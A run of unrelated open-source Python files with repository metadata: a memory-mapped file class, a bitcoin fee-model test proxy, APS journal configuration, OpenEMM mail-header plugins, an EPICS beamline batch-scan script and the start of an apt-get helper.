    m_rsdt = np.ma.masked_values(monthly['rsdt'], 0)
    # Same output keys as loadNetCDF.
    dictA = {
        'rsds': m_rsds,
        'rsus': monthly['rsus'],
        'rsut': monthly['rsut'],
        'rsdt': m_rsdt,
        'rsutcs': monthly['rsutcs'],
        'rsdscs': m_rsdscs,
        'rsuscs': monthly['rsuscs'],
        'clt': m_clt,
        'lat': lat,
        'lon': lon,
        'rsdsoc': m_rsdsoc,
        'rsusoc': m_rsusoc,
        'rsutoc': m_rsutoc,
        'c': c,  # Cloud fraction as fraction, not %
    }
    return dictA
| {
"repo_name": "rdrussotto/pyAPRP",
"path": "APRP.py",
"copies": "1",
"size": "25480",
"license": "mit",
"hash": 7492859884158293000,
"line_mean": 44.9945848375,
"line_max": 124,
"alpha_frac": 0.6364599686,
"autogenerated": false,
"ratio": 2.841530054644809,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.39779900232448084,
"avg_score": null,
"num_lines": null
} |
"""A pseudo-file mapped into memory
Provides better performance for frequent reads/writes,
and makes reading/writing easier via regions (windows)
of memory. Allows memory to be accessed via array reads/
writes as well.
"""
import mmap
import logging
log = logging.getLogger(__name__)
class ReadOnlyError(Exception):
    """Raised when a write is attempted on a file mapped read-only."""

    def __init__(self, path):
        message = 'mapped file is flagged as read only: %s' % path
        super(ReadOnlyError, self).__init__(message)
class RegionOverflowError(Exception):
    """Raised when a requested offset exceeds the allocated region size."""

    def __init__(self, offset):
        message = 'region overflow offset: %d (did you allocate?)' % offset
        super(RegionOverflowError, self).__init__(message)
class Region(object):
    """A virtual region of mapped memory.

    This class is a 'faked' mmap() result that allows for the finer allocation
    of memory mappings beyond/below what the filesystem really allows. It is
    backed by true mmap()'d pages and uses magic methods to achieve the
    appearance of being an isolated region of memory.

    Fixes relative to the previous revision:
    - write() called the misspelled ``_sanitaize_segment`` and therefore
      always raised AttributeError;
    - __exit__ returned ``self`` (truthy), which silently suppressed any
      exception raised inside a ``with`` block;
    - __str__ advanced the read cursor as a side effect.
    """
    __slots__ = 'parent', 'base_offset', '__size', 'cursor'

    def __init__(self, parent, base_offset, size):
        self.parent = parent            # backing object exposing read()/write()/region()
        self.base_offset = base_offset  # offset of this region within the parent
        self.__size = size              # fixed size of the region in bytes
        self.cursor = 0                 # current read/write position within the region

    def __len__(self):
        return self.__size

    def __str__(self):
        # Render the whole region without disturbing the cursor.
        return str(self.read(offset=0, length=len(self), advance=False))

    def __enter__(self):
        return self

    def __exit__(self, tipo, value, traceback):
        # A falsy return lets exceptions raised inside the ``with`` block
        # propagate normally (returning self would swallow them).
        return False

    def region(self, offset=-1, size=-1):
        """Return a sub-region, translated into the parent's coordinates."""
        (offset, size) = self._sanitize_segment(offset, size)
        return self.parent.region(self.base_offset + offset, size)

    def _sanitize_segment(self, offset, length):
        """Normalize an (offset, length) pair.

        A negative offset means 'at the cursor'; a negative length means
        'to the end of the region'. Raises ValueError for an offset beyond
        the region or a zero length.
        """
        if offset >= len(self):
            raise ValueError('offset falls outside region size')
        elif offset < 0:
            offset = self.cursor
        if length == 0:
            raise ValueError('length must be at least 1')
        elif length < 0:
            length = len(self) - offset
        return (offset, length)

    def read(self, length=-1, offset=-1, advance=True):
        """Read *length* bytes at *offset* (defaults: to-end / at-cursor),
        optionally advancing the cursor by the amount actually read."""
        (offset, length) = self._sanitize_segment(offset, length)
        offset += self.base_offset
        result = self.parent.read(length, offset, advance=advance)
        if advance:
            self.cursor += len(result)
        return result

    def write(self, value, length=-1, offset=-1, advance=True):
        """Write *value* at *offset*; returns the number of bytes written.

        A negative length defaults to len(value).
        """
        if length < 0:
            length = len(value)
        (offset, length) = self._sanitize_segment(offset, length)
        offset += self.base_offset
        result = self.parent.write(value, length, offset, advance=advance)
        if advance:
            self.cursor += result
        return result
class MappedFile(Region):
    """Manages mmap()-ings of a file into vmem.

    This class prevents virtual address space from growing too large by
    re-using existing maps if the requested regions have already been mapped.

    The file is carved into fixed-size pages (page_count * mmap.PAGESIZE
    bytes each); a page is mmap()'d lazily the first time a region touching
    it is requested, and cached in self._pages keyed by page id.
    """
    def __init__(self, path, page_count, read_only=False):
        # XXX TODO NOTE remove this line when write functionality is added.
        read_only = True
        # getting 'too many files open' error? increase the constant on the next line
        # (must be an exponent of 2)
        self._page_size = page_count * mmap.PAGESIZE
        # make sure we're sane here - allocation granularity needs to divide into page size!
        assert (self._page_size % mmap.ALLOCATIONGRANULARITY) == 0, 'page size is not a multiple of allocation granularity!'
        # 'r+b' keeps the descriptor writable for when write support lands.
        self._file = open(path, 'r+b')
        self._pages = dict()  # page id -> live mmap object
        self.read_only = read_only
        self._path = path
        self.cursor = 0
        # The file presents itself as one big Region whose parent is itself.
        super(MappedFile, self).__init__(self, base_offset=0, size=len(self))
    def __len__(self):
        # File length is re-queried on demand by seeking to the end
        # (not cached, so it tracks external file growth).
        self._file.seek(0, 2)
        size = self._file.tell()
        return size
    def __del__(self):
        # NOTE(review): close() is not idempotent; confirm __del__ cannot run
        # after an explicit close() (closing a closed mmap/file raises).
        self.close()
    def close(self):
        """Unmaps all mappings"""
        for i in self._pages:
            self._pages[i].close()
        self._file.close()
    def region(self, offset, size):
        """Requests a virtual region be 'allocated'"""
        # Identify the range of page ids the [offset, offset+size) span touches.
        lower_page = offset - (offset % self._page_size)
        upper_page = ((offset + size) // self._page_size) * self._page_size
        lower_page_id = lower_page // self._page_size
        upper_page_id = upper_page // self._page_size
        # make sure we're mapped
        for i in range(lower_page_id, upper_page_id + 1):
            if i not in self._pages:
                page_offset = i * self._page_size
                # The final page may be shorter than a full page.
                page_size = min(self._page_size, len(self) - page_offset)
                log.debug('mapping vfile page: id=%d offset=%d size=%d', i, page_offset, page_size)
                self._pages[i] = mmap.mmap(self._file.fileno(), offset=page_offset, length=page_size)
        # create a region
        return Region(self, base_offset=offset, size=size)
    def read(self, length=1, offset=-1, advance=True):
        """Reads data from the virtual region"""
        (offset, length) = self._sanitize_segment(offset, length)
        results = []
        length = min(length, len(self))
        # Walk pages, taking as much as each page holds from the running offset.
        abs_offset = offset
        cur_page = abs_offset // self._page_size
        abs_offset %= self._page_size
        while length > 0:
            readable = self._page_size - abs_offset
            readable = min(readable, length)
            results.append(self._pages[cur_page][abs_offset:abs_offset + readable])
            length -= readable
            # After the first page, subsequent reads start at the page boundary.
            abs_offset = 0
            cur_page += 1
        # NOTE(review): ''.join over mmap slices assumes Python 2 (slices are
        # str); on Python 3 the slices are bytes -- confirm target runtime.
        result = ''.join(results)
        if advance:
            self.cursor += len(result)
        return result
    def write(self, value, offset=-1, length=-1, advance=True):
        # Write support is not implemented yet (read_only is forced True in
        # __init__); this path only validates the read-only flag.
        if self.read_only:
            raise ReadOnlyError(self._path)
        # TODO
        assert False, 'not implemented'
        return 0
    def __getitem__(self, offset):
        # Supports both single-offset access and slicing (with optional step).
        if isinstance(offset, slice):
            (start, fin, step) = offset.indices(len(self))
            result = self.read(offset=start, length=fin - start)
            if step not in [None, 1]:
                result = result[::step]
            return result
        if not isinstance(offset, int):
            raise TypeError('offset is not an integer: %s' % repr(offset))
        if offset >= len(self):
            raise RegionOverflowError(offset)
        # NOTE(review): assumes the page containing `offset` was already
        # mapped via region(); otherwise this raises KeyError -- confirm.
        page = offset // self._page_size
        rel_offset = offset % self._page_size
        return self._pages[page][rel_offset]
    def __setitem__(self, offset, value):
        if self.read_only:
            raise ReadOnlyError(self._path)
        if isinstance(offset, slice):
            raise ValueError('Slice assignment not supported in mapped files; assemble your data first and then write')
        if not isinstance(offset, int):
            raise TypeError('offset is not an integer: %s' % repr(offset))
        if offset >= len(self):
            raise RegionOverflowError(offset)
        page = offset // self._page_size
        rel_offset = offset % self._page_size
        # Writing through the mmap object updates the underlying file page.
        self._pages[page][rel_offset] = value
| {
"repo_name": "Qix-/starfuse",
"path": "starfuse/fs/mapped_file.py",
"copies": "1",
"size": "7231",
"license": "mit",
"hash": -2743488025018029000,
"line_mean": 32.7897196262,
"line_max": 124,
"alpha_frac": 0.5992255566,
"autogenerated": false,
"ratio": 4.076099210822999,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5175324767423,
"avg_score": null,
"num_lines": null
} |
'''A pseudo proxy for testing purposes.'''
from bitcoin.core import CBlock
import feemodel.util
from feemodel.util import load_obj
import feemodel.txmempool
from feemodel.txmempool import MemBlock
from feemodel.tests.config import blockdata, test_memblock_dbfile as dbfile
class PseudoProxy(object):
    '''Stand-in for the real bitcoind proxy, for use in tests.

    getblock and getblockhash serve blocks 333931-333953 (the range of
    values in the memblock test db).

    Assign ``blockcount`` / ``rawmempool`` to control what getblockcount /
    getrawmempool (and poll_mempool) return.

    Set ``on = False`` to simulate a connection error: every method then
    raises Exception.
    '''
    def __init__(self):
        self.blockcount = 0
        self.rawmempool = {}
        self.on = True
        self._blockhashes, blocks_ser = load_obj(blockdata)
        self._blocks = dict(
            (blockhash, CBlock.deserialize(block_ser))
            for blockhash, block_ser in blocks_ser.items())

    def _assert_connected(self):
        # Mimic a dropped connection when the proxy is switched off.
        if not self.on:
            raise Exception

    def getblockhash(self, blockheight):
        self._assert_connected()
        return self._blockhashes[blockheight]

    def getblock(self, blockhash):
        self._assert_connected()
        return self._blocks[blockhash]

    def getrawmempool(self, verbose=True):
        self._assert_connected()
        return self.rawmempool

    def getblockcount(self):
        self._assert_connected()
        return self.blockcount

    def poll_mempool(self):
        self._assert_connected()
        return self.blockcount, self.rawmempool

    def set_rawmempool(self, height):
        '''Set the rawmempool from test memblock with specified height.'''
        b = MemBlock.read(height, dbfile=dbfile)
        self.rawmempool = rawmempool_from_mementries(b.entries)
# Module-level singleton; install() wires this into the feemodel modules.
proxy = PseudoProxy()
def install():
    '''Substitutes the real proxy with our pseudo one.

    Both feemodel.util and feemodel.txmempool hold their own module-level
    reference to the proxy object, so each must be patched separately.
    '''
    feemodel.util.proxy = proxy
    feemodel.txmempool.proxy = proxy
def rawmempool_from_mementries(entries):
    '''Convert mementries to rawmempool format.

    Each entry object is flattened into a plain dict of the attributes
    that bitcoind's verbose getrawmempool would report.
    '''
    attrs = (
        'currentpriority',
        'startingpriority',
        'fee',
        'depends',
        'height',
        'size',
        'time',
    )
    return dict(
        (txid, dict((attr, getattr(entry, attr)) for attr in attrs))
        for txid, entry in entries.items())
| {
"repo_name": "bitcoinfees/bitcoin-feemodel",
"path": "feemodel/tests/pseudoproxy.py",
"copies": "1",
"size": "2530",
"license": "mit",
"hash": 7439802814858999000,
"line_mean": 26.2043010753,
"line_max": 75,
"alpha_frac": 0.6411067194,
"autogenerated": false,
"ratio": 4.100486223662885,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5241592943062885,
"avg_score": null,
"num_lines": null
} |
# APS Journal dictionary: used by parsers/aps.py to get the bibstem
# Maps the APS-internal journal code to the ADS bibstem abbreviation.
APS_PUBLISHER_IDS = {'PRL': 'PhRvL', 'PRX': 'PhRvX', 'RMP': 'RvMP',
                     'PRA': 'PhRvA', 'PRB': 'PhRvB', 'PRC': 'PhRvC',
                     'PRD': 'PhRvD', 'PRE': 'PhRvE', 'PRAB': 'PhRvS',
                     'PRSTAB': 'PhRvS', 'PRAPPLIED': 'PhRvP',
                     'PRFLUIDS': 'PhRvF', 'PRMATERIALS': 'PhRvM',
                     'PRPER': 'PRPER', 'PRSTPER': 'PRSTP', 'PR': 'PhRv',
                     'PRI': 'PhRvI','PHYSICS': 'PhyOJ'}
# Astronomy/astrophysics subject keywords recognized in APS records.
APS_ASTRO_KEYWORDS = [
    'Accretion disk & black-hole plasma',
    'Active & peculiar galaxies',
    'Alternative gravity theories',
    'Anthropic considerations',
    'Asteroids, meteors, & meteorites',
    'Astronomical black holes',
    'Astronomical masses & mass distributions',
    'Astrophysical & cosmological simulations',
    'Astrophysical electromagnetic fields',
    'Astrophysical fluid dynamics',
    'Astrophysical jets',
    'Astrophysical studies of gravity',
    'Baryogenesis & leptogenesis',
    'Big bang nucleosynthesis',
    'Binary stars',
    'Canonical quantum gravity',
    'Classical black holes',
    'Composition of astronomical objects',
    'Cosmic microwave background',
    'Cosmic ray & astroparticle detectors',
    'Cosmic ray acceleration',
    'Cosmic ray composition & spectra',
    'Cosmic ray propagation',
    'Cosmic ray sources',
    'Cosmic rays & astroparticles',
    'Cosmic strings & domain walls',
    'Cosmological constant',
    'Cosmological parameters',
    'Cosmology',
    'Dark energy',
    'Dark matter',
    'Dark matter detectors',
    'Distances, redshifts, & velocities',
    'Electromagnetic radiation astronomy',
    'Evolution of the Universe',
    'Experimental studies of gravity',
    'Explosive burning',
    'Extrasolar neutrino astronomy',
    'Extrasolar planets',
    'Fluid planets',
    'Fluids & classical fields in curved spacetime',
    'Formation & evolution of stars & galaxies',
    'Galactic disks',
    'Galactic halos',
    'Galactic nuclei & quasars',
    'Galaxies',
    'Galaxy clusters',
    'Gamma ray astronomy',
    'Gamma ray bursts',
    'General relativity',
    'General relativity equations & solutions',
    'General relativity formalism',
    'Gravitation',
    'Gravitational lenses',
    'Gravitational wave detection',
    'Gravitational wave detectors',
    'Gravitational wave sources',
    'Gravitational waves',
    'Gravity in dimensions other than four',
    'H & He burning',
    'Hydrostatic stellar nucleosynthesis',
    'Inflation',
    'Intergalactic medium',
    'Interplanetary magnetic field',
    'Interstellar medium',
    'Laboratory studies of gravity',
    'Laboratory studies of space & astrophysical plasmas',
    'Large scale structure of the Universe',
    'Loop quantum gravity',
    'Massive compact halo objects',
    'Milky Way',
    'Neutrino detectors',
    'Neutron stars & pulsars',
    'Normal galaxies',
    'Normal stars',
    'Novae & supernovae',
    'Nuclear astrophysics',
    'Nuclear physics of explosive environments',
    'Nucleosynthesis in explosive environments',
    'Numerical relativity',
    'Numerical simulations in gravitation & astrophysics',
    'Optical, UV, & IR astronomy',
    'Particle astrophysics',
    'Particle dark matter',
    'Planetary satellites & rings',
    'Planets & planetary systems',
    'Pre-main-sequence stars',
    'Primordial magnetic fields',
    'Quantum aspects of black holes',
    'Quantum cosmology',
    'Quantum fields in curved spacetime',
    'Quantum gravity',
    'Radio, microwave, & sub-mm astronomy',
    'Relativistic aspects of cosmology',
    'Singularities In general relativity',
    'Sky surveys',
    'Solar neutrinos',
    'Solar system & its planets',
    'Solid-surface planets',
    'Space & astrophysical plasma',
    'Space charge in beams',
    'Space science',
    'Space weather',
    'Spacetime symmetries',
    'Spacetime topology & causal structure',
    'Stars',
    'Stellar plasmas',
    'Sun',
    'Supergravity',
    'Supernova remnants',
    'Telescopes',
    'Transient & explosive astronomical phenomena',
    'Unruh effect',
    'Variable & peculiar stars',
    'X ray astronomy',
    'X ray bursts',
    'r process',
    's process'
    ]
# Tags stripped outright from JATS content (active/executable content).
JATS_TAGS_DANGER = ['php','script','css']
# MathML / formula tags preserved when sanitizing JATS markup.
JATS_TAGS_MATH = ['inline-formula',
                  'mml:math',
                  'mml:semantics',
                  'mml:mrow',
                  'mml:munder',
                  'mml:mo',
                  'mml:mi',
                  'mml:msub',
                  'mml:mover',
                  'mml:mn',
                  'mml:annotation'
                  ]
# Plain HTML-ish tags preserved in titles/abstracts.
JATS_TAGS_HTML = ['sub','sup','a','astrobj']
# Per-field whitelist of tags allowed to survive sanitization.
JATS_TAGSET = {'title':JATS_TAGS_MATH + JATS_TAGS_HTML,
               'abstract':JATS_TAGS_MATH + JATS_TAGS_HTML + ['pre','br'],
               'comments':JATS_TAGS_MATH + JATS_TAGS_HTML + ['pre','br'],
               'affiliations':['email','orcid'],
               'keywords':['astrobj']
               }
| {
"repo_name": "adsabs/parsers",
"path": "pyingest/config/config.py",
"copies": "1",
"size": "5915",
"license": "mit",
"hash": 4724038807153585000,
"line_mean": 37.4090909091,
"line_max": 72,
"alpha_frac": 0.5180050719,
"autogenerated": false,
"ratio": 3.7484157160963245,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.47664207879963244,
"avg_score": null,
"num_lines": null
} |
# Plugin configuration, populated by the mail processor before use.
# NOTE(review): handleOutgoingMail also reads __aps__['precedence'],
# ['x-job'], ['list-id'] and ['abuse-reports-to'], which are not pre-seeded
# here -- confirm the caller always injects them (a missing key would
# raise KeyError).
__aps__ = {
    'api': '1.0.0',
    'version': '1.0',
    'uri': None,
    'urimatrix': None
}
import re
import sys
try:
import agn
except:
sys.path.append('/home/openemm/bin/scripts/')
import agn
def handleOutgoingMail(ctx, mail):
    """Mail-processing hook run on each outgoing message (Python 2).

    Appends, when configured in __aps__ and not already present:
    Precedence, X-job, List-ID, X-Abuse-Reports-To and List-Unsubscribe
    headers.  The agn UID parsed from the Message-ID local part supplies
    the mailing/company ids used for X-job and List-ID.
    """
    precedence = __aps__['precedence']
    if precedence:
        # Only add a Precedence header if none exists yet.
        found = None
        for line in mail.head:
            if line.lower().startswith('precedence'):
                found = line
                break
        if found is None:
            mail.head.append('Precedence: %s' % precedence)
    domain = mail.sender.rsplit('@', 1)[1]
    # The Message-ID local part encodes the agn UID.
    re_str = r"Message-ID: <(?P<uidstr>.*)@.*>"
    reg = re.compile(re_str)
    uidstr = None
    uid = None
    for header in mail.head:
        if header.lower().startswith('message-id:'):
            # print header
            # NOTE(review): the startswith test is case-insensitive but the
            # regex is not; reg.search() can return None here, making
            # m.group() raise AttributeError -- confirm header casing.
            m = reg.search(header)
            uidstr = m.group("uidstr")
            break
    if not uidstr is None:
        uid = agn.UID()
        try:
            uid.parseUID(uidstr)
        except Exception as ex:
            print ex
    xjob = __aps__['x-job']
    if not uid is None and xjob:
        if uid.mailingID > 0:
            mail.head.append('X-job: ' + xjob % str(uid.mailingID))
    listid = __aps__['list-id']
    if not uid is None and listid:
        if uid.mailingID > 0:
            mail.head.append('List-ID: ' + listid % (
                str(uid.companyID), domain))
    abusereports = __aps__['abuse-reports-to']
    if abusereports:
        mail.head.append(
            'X-Abuse-Reports-To: ' + abusereports % domain)
    urimatrix = __aps__['urimatrix']
    uri = __aps__['uri']
    if urimatrix or uri:
        # Add a List-Unsubscribe header unless one is already present.
        found = None
        mid = None
        for line in mail.head:
            if line.lower().startswith('list-unsubscribe:'):
                found = line
            elif line.lower().startswith('message-id:'):
                m = re.search(
                    'Message-ID: <(?P<mid>.*)@.*>', line)
                mid = m.group(1)
        if found is None:
            try:
                from urllib2 import quote
            except ImportError:
                from urllib import quote
            # Template substitution values for the unsubscribe URI templates.
            data = {
                'sender': mail.sender,
                'urlsender': quote(mail.sender),
                'recv': mail.receiver,
                'urlrecv': quote(mail.receiver),
                'mid': mid
            }
            isInMatrix = False
            if urimatrix and not mid is None:
                # urimatrix lines have the form 'domain|mailto-tmpl|http-tmpl'.
                sDomain = mail.sender.rsplit('@', 1)[1]
                for cline in urimatrix.split('\n'):
                    if cline.startswith(sDomain + '|'):
                        mail.head.append('List-Unsubscribe: <%s>, <%s>' % (
                            cline.split('|')[1] % data, cline.split('|')[2] % data, ))
                        isInMatrix = True
                        break
            if uri and not isInMatrix:
                # Fall back to the global template when no matrix entry matched.
                mail.head.append(
                    'List-Unsubscribe: <%s>' % (uri % data, ))
if __name__ == '__main__':
    # Ad-hoc smoke test (Python 2 print statements): exercises the hook with
    # a fake mail object and prints the headers it appends.
    def _main():
        class struct:
            pass
        mail = struct()
        mail.head = []
        mail.head.append(
            'Message-ID: <20130823020049-1.1.h.b.0.pp89lw4y80@news.gnlv.fr>')
        mail.sender = 'news@toto.com'
        mail.receiver = 'someone@somewhere.com'
        __aps__['precedence'] = 'bulk'
        __aps__['x-job'] = '%s'
        __aps__['list-id'] = '<%s.%s>'
        __aps__['abuse-reports-to'] = '<abuse@%s>'
        handleOutgoingMail(None, mail)
        print mail.head[0]
        print mail.head[1]
        print mail.head[2]
        print mail.head[3]
        print mail.head[4]
        mail.head = []
        __aps__['uri'] = 'http://localhost/unsubscribe?%(urlrecv)s'
        handleOutgoingMail(None, mail)
        print mail.head[0]
        mail.head = []
        __aps__['urimatrix'] = 'news.example.com|mailto:DUN-%(urlrecv)s@lu.example.com|http://news.example.com?%(urlrecv)s\nletter.com|mailto:ext-%(urlrecv)s@localhost|http://localhost?%(urlrecv)s'
        handleOutgoingMail(None, mail)
    _main()
| {
"repo_name": "AntonOfTheWoods/openemm-patches",
"path": "full_domain_personalisation/script/process/semu/headerManager.py",
"copies": "1",
"size": "5151",
"license": "mit",
"hash": -4554935613438596600,
"line_mean": 38.320610687,
"line_max": 205,
"alpha_frac": 0.3915744516,
"autogenerated": false,
"ratio": 4.611459265890779,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5503033717490778,
"avg_score": null,
"num_lines": null
} |
# Plugin configuration; 'uri' (global template) and/or 'urimatrix'
# (per-sender-domain templates) must be set by the mail processor for
# handleOutgoingMail to add a List-Unsubscribe header.
__aps__ = {
    'api': '1.0.0',
    'version': '1.0',
    'uri': None,
    'urimatrix': None
}
import re
#
def handleOutgoingMail(ctx, mail):
    """Mail-processing hook: append a List-Unsubscribe header if absent.

    Reads __aps__['urimatrix'] (newline-separated 'domain|mailto|http'
    template lines, matched against the sender's domain) and __aps__['uri']
    (global fallback template).  Templates are %-interpolated with the
    sender/receiver (raw and URL-quoted) and the Message-ID local part.
    """
    urimatrix = __aps__['urimatrix']
    uri = __aps__['uri']
    if urimatrix or uri:
        found = None
        mid = None
        for line in mail.head:
            if line.lower().startswith('list-unsubscribe:'):
                found = line
            elif line.lower().startswith('message-id:'):
                # Fix: match case-insensitively (the startswith test above is
                # case-insensitive while the pattern was not) and guard
                # against a malformed Message-ID, which previously raised
                # AttributeError on m.group().
                m = re.search(
                    'Message-ID: <(?P<mid>.*)@.*>', line, re.IGNORECASE)
                if m is not None:
                    mid = m.group('mid')
        if found is None:
            try:
                from urllib2 import quote
            except ImportError:
                from urllib import quote
            # Substitution values available to the URI templates.
            data = {
                'sender': mail.sender,
                'urlsender': quote(mail.sender),
                'recv': mail.receiver,
                'urlrecv': quote(mail.receiver),
                'mid': mid
            }
            isInMatrix = False
            if urimatrix and not mid is None:
                sDomain = mail.sender.rsplit('@', 1)[1]
                for cline in urimatrix.split('\n'):
                    if cline.startswith(sDomain + '|'):
                        mail.head.append('List-Unsubscribe: <%s>, <%s>' % (
                            cline.split('|')[1] % data, cline.split('|')[2] % data, ))
                        isInMatrix = True
                        break
            if uri and not isInMatrix:
                # Fall back to the global template when no matrix entry matched.
                mail.head.append(
                    'List-Unsubscribe: <%s>' % (uri % data, ))
if __name__ == '__main__':
    # Ad-hoc smoke test (Python 2 print statements): exercises the hook with
    # a fake mail object, first with the global 'uri' template, then with a
    # 'urimatrix' entry, printing the generated List-Unsubscribe header.
    def _main():
        class struct:
            pass
        mail = struct()
        mail.head = []
        mail.sender = 'news@toto.com'
        mail.receiver = 'someone@somewhere.com'
        __aps__['uri'] = 'http://localhost/unsubscribe?%(urlrecv)s'
        handleOutgoingMail(None, mail)
        print mail.head[0]
        mail.head = []
        __aps__['urimatrix'] = 'news.example.com|mailto:DUN-%(urlrecv)s@lu.example.com|http://news.example.com?%(urlrecv)s\nletter.com|mailto:ext-%(urlrecv)s@localhost|http://localhost?%(urlrecv)s'
        handleOutgoingMail(None, mail)
        print mail.head[0]
    _main()
| {
"repo_name": "AntonOfTheWoods/openemm-patches",
"path": "full_domain_personalisation/script/process/semu/listUnsubscribeHeader.py",
"copies": "1",
"size": "2875",
"license": "mit",
"hash": -1808768738562226200,
"line_mean": 41.9104477612,
"line_max": 205,
"alpha_frac": 0.3669565217,
"autogenerated": false,
"ratio": 4.991319444444445,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0064928010867825355,
"num_lines": 67
} |
#!/APSshare/epd/rh5-x86/bin/python
'''
This is for X-piezo scan (stage coordinates) and Y-combined (stage coordinates) batch flyscan with different sample_Z postions.
The max scan width in X direction is 80 um.
'''
import epics
from epics import caput, caget
from epics import PV
import time
import numpy as np
import pdb
'''
please enter the scan prameters below:
scans [x-center(um) y-center.(um), z-position (um), x-width.(um), y-width.(um), x-stepsize.(um), Y-stepsize.(um), dwell.(ms)]
'''
# Sets xyDiffMotion=1 for the batch and resets it to 0 at the end.
# NOTE(review): presumably enables differential XY motion -- confirm.
caput('9idbTAU:SM:Ps:xyDiffMotion.VAL', 1)
# Each row: [x-center, y-center, z-position, x-width, y-width,
#            x-stepsize, y-stepsize, dwell(ms)] (see module docstring).
scans = [[482.3,-2131.6,247.5,10,10,0.02,0.02,50],
         [482.3,-2131.6,247.5,10,10,0.02,0.02,50],
         [482.3,-2131.6,247.5,12,12,0.02,0.02,50]
         ]
# add some lines to check the beam alignment
# PVs written per scan, positionally matched to the row entries above.
# NOTE(review): '9idbBNP:scanTran3.C PP' contains an embedded space --
# confirm this is the intended PV name/field syntax.
pvs = ['9idbTAU:SM:PX:RqsPos', '9idbTAU:SY:PY:RqsPos', '9idbTAU:SM:SZ:RqsPos', '9idbBNP:scan1.P1WD', '9idbBNP:scan2.P1WD', '9idbBNP:scan1.P1SI', '9idbBNP:scan2.P1SI', '9idbBNP:scanTran3.C PP']
# Requested/actual position PVs used to confirm motor arrival.
sm_px_RqsPos=PV('9idbTAU:SM:PX:RqsPos')
sm_px_ActPos=PV('9idbTAU:SM:PX:ActPos')
sm_py_RqsPos=PV('9idbTAU:SY:PY:RqsPos')
sm_py_ActPos=PV('9idbTAU:SY:PY:ActPos')
print 'Batchscan starts'
for batch_num, scan in enumerate(scans):
    #pdb.set_trace()
    print 'changing XY scan mode to combined motion'
    caput('9idbTAU:SM:Ps:xMotionChoice.VAL', 0) #0: Stepper+piezo, 1: stepper only, 2: piezo only
    time.sleep(2.)
    caput('9idbTAU:SY:Ps:yMotionChoice.VAL', 0)
    time.sleep(2.)
    #print 'scan #{0:d} starts'.format(batch_num)
    print 'entering scan parameters for scan #{0:d}'.format(batch_num+1)
    for i, pvs1 in enumerate(pvs):
        #print 'Setting %s' %pvs1
        caput(pvs1, scans[batch_num][i])
        time.sleep(1.)
    # check whether the motors have moved to the requested position
    print 'checking whether motors are in position'
    ready=abs(sm_px_ActPos.get()-sm_px_RqsPos.get())<0.1 and abs(sm_py_ActPos.get()-sm_py_RqsPos.get())<0.1
    while not ready:
        # Re-issue the request and poll until both axes are within 0.1 um.
        print '\t Motors are not ready'
        sm_px_RqsPos.put(sm_px_RqsPos.get())
        sm_py_RqsPos.put(sm_py_RqsPos.get())
        time.sleep(3.)
        ready=abs(sm_px_ActPos.get()-sm_px_RqsPos.get())<0.1 and abs(sm_py_ActPos.get()-sm_py_RqsPos.get())<0.1
    print '\t Motors are ready now!'
    print 'setting the current position as the center of the scan'
    caput('9idbBNP:aoRecord11.PROC', 1)
    time.sleep(3.)
    caput('9idbBNP:aoRecord12.PROC', 1)
    time.sleep(3.)
    print 'changing X scan mode to Piezo only'
    caput('9idbTAU:SM:Ps:xMotionChoice.VAL', 2)
    time.sleep(3.)
    print 'centering piezoX and piezoY'
    # Centering is issued twice per axis; presumably for settling -- confirm.
    caput('9idbTAU:SM:Ps:xCenter.PROC', 1)
    time.sleep(3.)
    caput('9idbTAU:SY:Ps:yCenter.PROC', 1)
    time.sleep(3.)
    caput('9idbTAU:SM:Ps:xCenter.PROC', 1)
    time.sleep(3.)
    caput('9idbTAU:SY:Ps:yCenter.PROC', 1)
    time.sleep(3.)
    # Start the fly scan and poll until EXSC reads back 0 (scan done).
    caput('9idbBNP:scan2.EXSC', 1)
    time.sleep(1.)
    done = False
    print 'Checking every 10 sec for scan to complete'
    while not done:
        done = caget('9idbBNP:scan2.EXSC')==0
        print '\t Batch {0:d}/{1:d} scan is ongoging'.format(batch_num+1,len(scans))
        time.sleep(10.)
print 'Completeted. Congratulations!'
caput('9idbTAU:SM:Ps:xMotionChoice.VAL', 0)
caput('9idbTAU:SM:Ps:xyDiffMotion.VAL', 0)
raw_input("Press Enter to exit")
| {
"repo_name": "tomography/scanscripts",
"path": "aps_21id/201702_BNP_batch_flyscan_with_z.py",
"copies": "1",
"size": "3256",
"license": "bsd-3-clause",
"hash": -3166853593587177000,
"line_mean": 31.56,
"line_max": 192,
"alpha_frac": 0.6667690418,
"autogenerated": false,
"ratio": 2.3424460431654675,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.35092150849654674,
"avg_score": null,
"num_lines": null
} |
"""aptget -- utility functions to run apt-get (ubuntu/debian package manager),
along with a generic resource manager for apt packages"""
import os
import os.path
import sys
import re
import copy
import engage.drivers.resource_manager as resource_manager
import engage.drivers.resource_metadata as resource_metadata
import engage_utils.process as iuprocess
import engage.utils.log_setup
from engage.drivers.password_repo_mixin import PasswordRepoMixin
from engage.drivers.action import Action, _check_file_exists, make_value_action, make_action
from engage.utils.file import NamedTempFile
import engage_utils.pkgmgr
logger = engage.utils.log_setup.setup_script_logger(__name__)
from engage.utils.user_error import ScriptErrInf, UserError, convert_exc_to_user_error
import gettext
_ = gettext.gettext
errors = { }
def define_error(error_code, msg):
    """Register an error definition in the module-wide ``errors`` table."""
    global errors
    info = ScriptErrInf(__name__, error_code, msg)
    errors[info.error_code] = info
# error codes
ERR_APT_GET_NOT_FOUND = 1
ERR_APT_GET_INSTALL = 2
ERR_DPKG_QUERY_NOT_FOUND = 3
ERR_INSTALL_PKG_QUERY = 4
ERR_PKG_NOT_INSTALLED = 5
ERR_DPKG_NOT_FOUND = 6
ERR_PKG_FILE_NOT_FOUND = 7
ERR_DPKG_INSTALL = 8
# Register the user-visible (gettext-wrapped) message for each code.
define_error(ERR_APT_GET_NOT_FOUND,
             _("apt-get executable not found at %(path)s"))
define_error(ERR_APT_GET_INSTALL,
             _("apt-get install failed for packages %(pkgs)s"))
define_error(ERR_DPKG_QUERY_NOT_FOUND,
